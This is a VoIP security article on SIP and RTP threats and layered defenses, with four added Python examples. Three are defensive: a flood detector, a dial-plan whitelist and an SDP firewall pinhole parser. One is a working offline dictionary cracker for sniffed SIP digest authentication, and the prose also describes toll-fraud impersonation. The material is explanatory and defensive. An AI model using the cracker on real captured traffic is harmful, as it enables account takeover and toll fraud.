VoIP has finally arrived as a mainstream application, so security is important when you're replacing the world's oldest, largest and most resilient and available communications network.
In fact, analysts predict that IP PBXs will account for more than 90% of the market by 2009. Before you deploy VoIP, however, you need to be aware of the security risks and the countermeasures that you can take.
No individual security measure will eliminate attacks against VoIP deployments entirely, but a layered approach can meaningfully reduce the probability that an attack succeeds.
The threats
Enterprise VoIP customers and service providers are vulnerable to many of the same impersonation-based attacks "phreakers" attempt against traditional telephone and cellular services. The goals - identity and information theft and toll fraud - are the same.
Many attacks focus on VoIP endpoints. The operating systems, Internet protocols, applications and management interfaces of VoIP hard phones and of computers running softphones are vulnerable to unauthorized access, viruses and worms, and to many denial-of-service (DoS) attacks that exploit common Internet protocols and the VoIP protocols themselves.
VoIP uses the IETF Session Initiation Protocol (SIP) for call signaling and the Real-time Transport Protocol (RTP) for media delivery. These and the complementary session description and RTP control protocols (SDP, RTCP) do not, by themselves, provide adequate call-party authentication, end-to-end integrity protection or confidentiality for call signaling and call data (such as media streams carrying compressed and encoded speech). Secure variants exist (SIP over TLS, Secure RTP), but until they are implemented in products and put into service, attackers have many vectors to exploit.
In most deployments today, SIP signaling and RTP media travel in the clear, so the identities, credentials and SIP Uniform Resource Identifiers (SIP URIs, the VoIP equivalent of phone numbers) of callers can be captured using LAN and wireless LAN (WLAN) traffic-collection tools (sniffers). SIP's digest authentication hides the password itself from a sniffer, but the captured challenge and response are enough for an attacker to guess the password offline.
An attacker can use captured account information to impersonate a user to a customer representative or self-service portal, where he can change the calling plan to permit calls to 900 numbers or to blocked international numbers. He also can access voice mail or change a call forwarding number.
Impersonation attacks commonly are used to perpetrate toll fraud, but financially motivated attackers also can capture voice conversations and later replay them to obtain sensitive business or personal information.
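The capture-and-impersonate scenario above, as an added example that is not part of the original article: a SIP REGISTER carrying RFC 2617 digest authentication is sniffed from the LAN, the Authorization header is parsed, and the password is recovered by recomputing the digest for each candidate in a wordlist. The user, realm, nonce, addresses and passwords are invented for this example, and the hypothetical PBX is assumed to use plain digest without the qop parameter, which is what most SIP user agents send.

```python
import hashlib
import re

# Constructed example: identities, nonce and passwords are invented.
USERNAME = "alice"
REALM = "pbx.example.com"
URI = "sip:pbx.example.com"
NONCE = "dcd98b7102dd2f0e8b11d0f600bfb0c093"


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce):
    """RFC 2617 digest response without qop: MD5(HA1 ":" nonce ":" HA2)."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def build_register(password):
    """Return a REGISTER request as a LAN sniffer would capture it (constructed)."""
    response = digest_response(USERNAME, REALM, password, "REGISTER", URI, NONCE)
    return (
        "REGISTER sip:pbx.example.com SIP/2.0\r\n"
        "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
        f"From: <sip:{USERNAME}@{REALM}>;tag=1928301774\r\n"
        f"To: <sip:{USERNAME}@{REALM}>\r\n"
        "Call-ID: a84b4c76e66710@192.0.2.10\r\n"
        "CSeq: 2 REGISTER\r\n"
        f'Authorization: Digest username="{USERNAME}", realm="{REALM}", '
        f'nonce="{NONCE}", uri="{URI}", response="{response}", algorithm=MD5\r\n'
        "Content-Length: 0\r\n\r\n"
    )


def parse_authorization(message):
    """Everything the eavesdropper needs sits in one cleartext header."""
    method = message.split(" ", 1)[0]
    match = re.search(r"^Authorization:\s*Digest\s+(.*)$", message, re.M)
    if match is None:
        return None
    params = {"method": method}
    for key, quoted, bare in re.findall(r'(\w+)=(?:"([^"]*)"|([^,\s]+))', match.group(1)):
        params[key] = quoted or bare
    return params


def crack_digest(message, wordlist):
    """Offline dictionary attack: the captured nonce is fixed, so every guess
    costs three MD5 computations and sends no packets to the PBX."""
    p = parse_authorization(message)
    if p is None:
        return None
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate,
                                p["method"], p["uri"], p["nonce"])
        if guess == p["response"]:
            return candidate
    return None


if __name__ == "__main__":
    captured = build_register("secret123")
    print(parse_authorization(captured)["username"], "->",
          crack_digest(captured, ["password", "123456", "secret123"]))
```

Two practical points follow from this. Digest authentication only protects the password from being read directly; a weak password falls to offline guessing within seconds, so SIP accounts need long random secrets or, better, signaling carried over TLS so the exchange is never visible. And because the same captured header reveals the From URI, Call-ID and registrar, it is also all the attacker needs to craft a convincing impersonation toward a help desk or self-service portal.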
Flooding VoIP targets with SIP call-signaling messages (INVITE, REGISTER, BYE) or with RTP media-stream packets can degrade service, force calls to be dropped prematurely and render certain VoIP equipment incapable of processing calls at all. VoIP equipment also may be vulnerable to DoS attacks on the underlying Internet protocols, such as TCP SYN floods, the ping of death and the recent DNS amplification attacks used for distributed DoS.
VoIP systems also can be disrupted by media-specific attacks, such as Ethernet broadcast storms and Wi-Fi radio jamming. Operating systems and stacks used in new VoIP hardware may be susceptible to implementation-specific attacks that exploit programming flaws. This can cause the system to cease operating or provide the attacker with remote administrative control of the system.
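One way to spot the signaling floods described above, as an added example that is not part of the original article: a sliding-window counter keyed on source address and SIP method, run over a constructed proxy log. The log format, the addresses and the per-method thresholds are assumptions for this example; a real deployment would tune the thresholds to its own call volumes.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed policy: more than this many requests of one method from one source
# inside WINDOW_SECONDS is treated as a flood.
WINDOW_SECONDS = 10
THRESHOLDS = {"INVITE": 20, "REGISTER": 30, "BYE": 20}


def detect_floods(log_lines, window=WINDOW_SECONDS, thresholds=THRESHOLDS):
    """Sliding-window counter per (source, method).

    Returns {(source, method): timestamp of the first request that crossed the
    threshold}. Lines are expected in chronological order, as a log is written.
    """
    history = defaultdict(deque)
    alerts = {}
    for line in log_lines:
        ts_text, src, method, _request_uri = line.split(" ", 3)
        ts = datetime.fromisoformat(ts_text)
        key = (src, method)
        recent = history[key]
        recent.append(ts)
        while (ts - recent[0]).total_seconds() > window:   # drop stale entries
            recent.popleft()
        if len(recent) > thresholds.get(method, float("inf")) and key not in alerts:
            alerts[key] = ts_text
    return alerts


def sample_log():
    """Constructed SIP proxy log (invented format and addresses): one phone making
    three calls twenty seconds apart, and one host firing 25 INVITEs in five seconds."""
    base = datetime(2006, 5, 12, 10, 0, 0)
    lines = []
    for i in range(3):
        ts = base + timedelta(seconds=20 * i)
        lines.append(f"{ts.isoformat(timespec='milliseconds')} 192.0.2.10 INVITE sip:1001@pbx.example.com")
    for i in range(25):
        ts = base + timedelta(milliseconds=200 * i)
        lines.append(f"{ts.isoformat(timespec='milliseconds')} 192.0.2.55 INVITE sip:1001@pbx.example.com")
    return sorted(lines)


if __name__ == "__main__":
    for (src, method), when in detect_floods(sample_log()).items():
        print(f"{when} flood of {method} from {src}")
```

The same counter belongs in front of the registrar as well as the proxy: REGISTER floods are cheaper for the attacker than INVITEs because they require no dialog state, and a burst of REGISTERs for many different usernames from one address is also the signature of account enumeration.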
VoIP softphones pose a unique and thorny problem. Softphone applications run on user systems (PCs, PDAs) and thus are vulnerable to malicious code attacks against data and voice applications. IT administrators must consider the possibility that an attacker may try to evade conventional PC malware protection by injecting malicious code via a VoIP softphone application.
Spam often harbors spyware and remote administration tools. Spam over Internet telephony (SPIT) can carry unsolicited sales calls and other nuisance messages, and programs downloaded to softphones could include hidden malware.
Even this partial description should cause IT managers to assess the risk of introducing VoIP, and to develop a policy and an implementation plan to reduce the risks using security technology at hand.
Risk assessment
Voice is a perennial cash cow for traditional telephony service providers, a lucrative emerging market for VoIP vendors and a mission-critical service for businesses. Thus, the most serious risk public (carrier) and private (enterprise) VoIP operators must manage is service disruption.
VoIP users will expect no less than the high availability they are accustomed to receive from the public switched telephone network (PSTN). Accordingly, a thoughtful VoIP deployment plan for all would-be VoIP operators must include measures for reducing the threat of DoS attacks.
Other priority risks include identity theft and toll fraud. Public operators face a greater challenge than do PSTN and cellular carriers with identity and endpoint verification in VoIP deployment because endpoint IP addresses are generally not validated at Internet ingress points, and unlike public telephone numbers, there are as yet no widely adopted methods for VoIP operators to certify or assert cooperatively that a SIP identity is valid.
VoIP operators must manage trust relationships with other VoIP operators carefully and should avoid service arrangements unless they have some confidence that the other providers are using equivalent identity and endpoint verification methods. This might be arranged contractually across an extended enterprise or business-to-business VoIP deployment.
In general, insider attacks are more frequent than outsider attacks, so enterprise VoIP network operators must consider impersonation a threat even if they operate in isolation. Enterprise VoIP managers therefore must consider methods to detect and block impersonation attacks, and should maintain accounting and auditing tools to help detect abuse and identify perpetrators.
While public VoIP infrastructures may be more frequently targeted for politically motivated attacks and terrorism, private VoIP networks increasingly are at risk of electronic industrial espionage and eavesdropping attacks (for example, employees intercepting privileged calls).
Enterprise customers also must consider help desk and customer care. Service disruption, subscriber impersonation and toll fraud are serious support matters. Resolving disputes and restoring service to employees who are victims of such attacks sap resources and adversely affect productivity. The effects that security incidents may have on consumer, user, management and even shareholder confidence can be lasting.
Countermeasures
VoIP is a new and different type of Internet application, but ultimately it is another real-time data stream delivered using IP. Many of the security measures widely used today to protect other cleartext applications, from telnet and FTP to Web, e-mail and instant messaging, can be used to improve VoIP security.
The majority of VoIP service applications run on commercial server operating systems. Hardening these servers and employing antitampering and host-based protection measures demonstrably improve an organization's baseline VoIP security. The most frequently recommended server security measures that can be applied to voice servers include:
- Maintain patch currency for operating system and VoIP applications.
- Run only applications required to provide and maintain VoIP services.
- Require strong authentication for administrative and user account access.
- Enable only the user accounts required for maintenance and correct operation, to shrink the set of accounts exposed to password-guessing attacks.
- Implement stringent authorization policies to prevent unauthorized access to VoIP service and account data.
- Audit administrative and user sessions and service-related activities.
- Install and maintain server firewall, antimalware and antitampering measures to resist malware and DoS attacks.
- Securely configure VoIP applications to prevent misuse; for example, a whitelist of callable country codes can thwart certain call forward, transfer and social-engineering exploits that might result in toll fraud and unauthorized use.
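The country-code whitelist in the last item, as an added example that is not part of the original article: a dial-plan check that normalizes a dialed number, strips the international prefix, resolves the E.164 country code by longest-prefix match and then applies the policy. The whitelist, the blocked premium-rate area codes and the assumption that the PBX sits in the North American Numbering Plan (so 011 is the international prefix) are all invented for this example, and the country-code table is a partial one.

```python
import re

# Assumed policy for a hypothetical NANP-based PBX: international calls only to
# these country codes, and never to NANP premium-rate area codes.
ALLOWED_COUNTRY_CODES = {"1", "44", "49"}
BLOCKED_NANP_AREA_CODES = {"900", "976"}
INTERNATIONAL_PREFIXES = ("+", "011")      # "+" from SIP URIs, 011 from NANP dialing

# Partial E.164 country-code table (constructed for this example; a real dial
# plan needs the full ITU list). Codes are 1 to 3 digits and prefix-free, so
# longest-prefix matching is unambiguous.
COUNTRY_CODES = {
    "1", "7", "20", "27", "30", "31", "32", "33", "34", "36", "39", "40", "41",
    "43", "44", "45", "46", "47", "48", "49", "51", "52", "53", "54", "55", "56",
    "57", "58", "60", "61", "62", "63", "64", "65", "66", "81", "82", "84", "86",
    "90", "91", "92", "93", "94", "95", "98", "212", "213", "216", "218", "220",
    "234", "254", "263", "351", "353", "358", "380", "420", "852", "880", "886",
    "966", "971", "972",
}


def classify_call(dialed):
    """Return ("allow", reason) or ("deny", reason) for a dialed number."""
    digits = re.sub(r"[^\d+]", "", dialed)          # drop spaces, dashes, parentheses
    for prefix in INTERNATIONAL_PREFIXES:
        if digits.startswith(prefix):
            digits = digits[len(prefix):]
            break
    else:
        # NANP national numbers never start with 0, so no prefix means a domestic call.
        return ("allow", "national call, not subject to country-code policy")
    for length in (3, 2, 1):                         # longest prefix first
        code = digits[:length]
        if code in COUNTRY_CODES:
            break
    else:
        return ("deny", "unknown country code")
    if code not in ALLOWED_COUNTRY_CODES:
        return ("deny", f"country code {code} not on whitelist")
    if code == "1" and digits[1:4] in BLOCKED_NANP_AREA_CODES:
        return ("deny", f"premium-rate area code {digits[1:4]}")
    return ("allow", f"country code {code}")


if __name__ == "__main__":
    for number in ("+1 415 555 0100", "011 1 900 555 0100", "+234 803 555 0100",
                   "+44 20 7946 0958", "555-0100", "+999 123"):
        print(f"{number:>20}: {classify_call(number)}")
```

The check has to run on the number the PBX will actually route, after any transfer or forwarding target has been resolved, or a call forwarded to a 900 number will slip past a whitelist that only inspects what the user originally dialed.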
Once VoIP servers and the applications they run are securely configured, build an in-depth defense by adding layers of security around them. Isolate VoIP servers and the infrastructure they require (for example, DNS) from client machines (phones, PCs and laptops) by using separate physical or virtual LANs (VLANs) to carry management, voice and data traffic.
Use firewalls to limit types of traffic that may cross VLAN boundaries to only those protocols necessary. This compartmentalization is especially effective in reducing the spread of malware from infected clients to VoIP servers in monoculture (such as Windows) networks. This often results in much simpler security policies in each compartmentalizing firewall than the policy you would have to maintain in a single firewall.
Segmentation is a powerful security tool, so don't stop here. The same segmentation methods used to heighten security can be used to implement QoS: For example, putting SIP phones on their own VLAN helps restrict VoIP to permitted devices and gives higher priority to VoIP as IP packets move from network edge to core.
Consider segregating voice user agents (hard phones) from PCs and laptops used to access networked data applications. This may prevent a successful attack against a data segment from spreading to and interfering with voice systems. Firewall performance may be an issue when applying segmentation and policy-based compartmentalization, so plan carefully to avoid adding latency to paths that will transport media streams.
Endpoint security adds an outer layer of security in VoIP deployments. IEEE 802.1X port-based network access control and equivalent network admission techniques provide an additional layer of authorization control by blocking devices from using a LAN or WLAN until they pass security checks.
Administrators can choose to block devices infected with malware or that do not satisfy other admission criteria, such as current patches and appropriately configured firewalls. They can redirect noncompliant devices to an isolated LAN segment that offers limited services or to a LAN where softphone users can access software, patches and malware definition updates required to satisfy admission criteria. In many cases, these security measures can be performed before authentication, to prevent malware (keystroke loggers) from capturing user credentials.
Companies using firewalls to enforce security policy may discover that their current firewall is unsuited to the task of securing voice and data. Traditional network firewalls are designed to permit and deny traffic based on TCP, User Datagram Protocol (UDP) and IP header information: IP addresses, protocol types and port numbers, for example.
VoIP protocols use a large range of UDP ports and allocate them dynamically to media streams. Many traditional firewalls cannot accommodate this behavior without leaving large swaths of port numbers permanently open for VoIP use and other misuses. Certain firewalls do not process UDP efficiently. Others do not support QoS measures to manage latency and jitter so that VoIP calls have toll-voice quality.
IT administrators should consider firewalls that are SIP-aware, that can detect and counter attacks carried in SIP signaling messages, and that can process RTP media streams without adding significant latency.
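What "SIP-aware" means in practice for the dynamic-port problem, as an added example that is not part of the original article: the firewall reads the SDP body of the INVITE and its 200 OK answer, learns which address and UDP port each media stream will use, and opens only that RTP port and its RTCP companion for the life of the call. The 200 OK below is constructed for this example (addresses and ports are invented); the parsing rules it applies (session-level and media-level c= lines, port 0 for a rejected stream, RTCP at port+1 unless an a=rtcp: attribute says otherwise) are those of SDP itself.

```python
def rtp_pinholes(sip_message):
    """Derive the (address, UDP port, purpose) tuples a SIP-aware firewall must
    open for the media streams described in a SIP message's SDP body."""
    _headers, _sep, body = sip_message.partition("\r\n\r\n")
    session_addr = None
    streams = []
    current = None
    for line in body.splitlines():
        if len(line) < 2 or line[1] != "=":
            continue
        key, value = line[0], line[2:]
        if key == "c":
            addr = value.split()[2]                 # "IN IP4 192.0.2.20"
            if current is None:
                session_addr = addr                 # session-level default
            else:
                current["addr"] = addr              # media-level override
        elif key == "m":
            fields = value.split()                  # "audio 49170 RTP/AVP 0 8"
            current = {"media": fields[0], "port": int(fields[1]),
                       "addr": session_addr, "rtcp": None}
            streams.append(current)
        elif key == "a" and value.startswith("rtcp:") and current is not None:
            current["rtcp"] = int(value[5:].split()[0])   # RFC 3605 explicit RTCP port
    rules = []
    for s in streams:
        if s["port"] == 0:                          # port 0: stream rejected, open nothing
            continue
        rtcp = s["rtcp"] if s["rtcp"] is not None else s["port"] + 1
        rules.append((s["addr"], s["port"], "RTP " + s["media"]))
        rules.append((s["addr"], rtcp, "RTCP " + s["media"]))
    return rules


# Constructed 200 OK answer to an INVITE (addresses and ports invented).
SAMPLE_200_OK = (
    "SIP/2.0 200 OK\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
    "From: <sip:alice@pbx.example.com>;tag=1928301774\r\n"
    "To: <sip:bob@pbx.example.com>;tag=a6c85cf\r\n"
    "Call-ID: a84b4c76e66710@192.0.2.10\r\n"
    "CSeq: 314159 INVITE\r\n"
    "Content-Type: application/sdp\r\n"
    "\r\n"
    "v=0\r\n"
    "o=bob 2890844526 2890844526 IN IP4 192.0.2.20\r\n"
    "s=-\r\n"
    "c=IN IP4 192.0.2.20\r\n"
    "t=0 0\r\n"
    "m=audio 49170 RTP/AVP 0 8\r\n"
    "a=rtpmap:0 PCMU/8000\r\n"
    "m=application 0 udp wb\r\n"
    "m=video 51372 RTP/AVP 31\r\n"
    "c=IN IP4 192.0.2.21\r\n"
    "a=rtcp:53020\r\n"
)

if __name__ == "__main__":
    for addr, port, purpose in rtp_pinholes(SAMPLE_200_OK):
        print(f"permit udp to {addr}:{port}  # {purpose}")
```

Two caveats a practitioner will want. The pinhole must be tied to the dialog (Call-ID and tags) and torn down on BYE or on a media timeout, otherwise the firewall is back to leaving ports open indefinitely; and because the SDP offer is in the INVITE and the answer is in the 200 OK, both directions have to be parsed, so signaling encrypted end-to-end with TLS can only be inspected at a proxy or session border controller that terminates the TLS session.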
Application-layer gateways (ALGs) can play a useful role in VoIP deployment. Incorporating TLS (SSL) tunnels into SIP proxies is becoming a popular way to improve authentication and to add confidentiality and integrity protection on signaling messages exchanged between user agents and SIP proxies.
Many organizations are considering chaining TLS connections to protect signaling traffic between SIP proxies within and across organizations. RTP proxies may be appropriate if your organization must relay media streams between global and local RTP IP addresses and ports. Other organizations are choosing to take advantage of their existing investment in IPSec VPNs to secure VoIP traffic between sites.
In some configurations, organizations may process VoIP traffic preferentially by creating separate IPSec security associations for voice so that it can be prioritized over data. Some organizations may want to filter signaling traffic and RTP media streams through a Session Border Controller (SBC). SBCs operate as back-to-back user agents: they terminate the call from one side, originate a new call leg toward the other, and apply policy to the calls they join between public and private user agents. In some respects, an SBC behaves like a secure e-mail proxy. It can rewrite message headers to hide details of private networks (such as addresses), strip unknown and undesirable SIP header fields, and restrict called-party numbers. Because media traffic flows through an SBC, RTP policies can be enforced there as well.
These security measures, along with a proactive security monitoring and intrusion-detection and -prevention plan, not only improve VoIP security, but can greatly reduce the risks to data networks as organizations introduce VoIP. Many of these measures will continue to be useful even after security enhancements are incorporated into VoIP protocols and architecture.
Piscitello is president of Core Competence, an ICANN SSAC Fellow and author, with Alan Johnston, of Understanding Voice over IP Security. He can be reached at dave@corecom.com.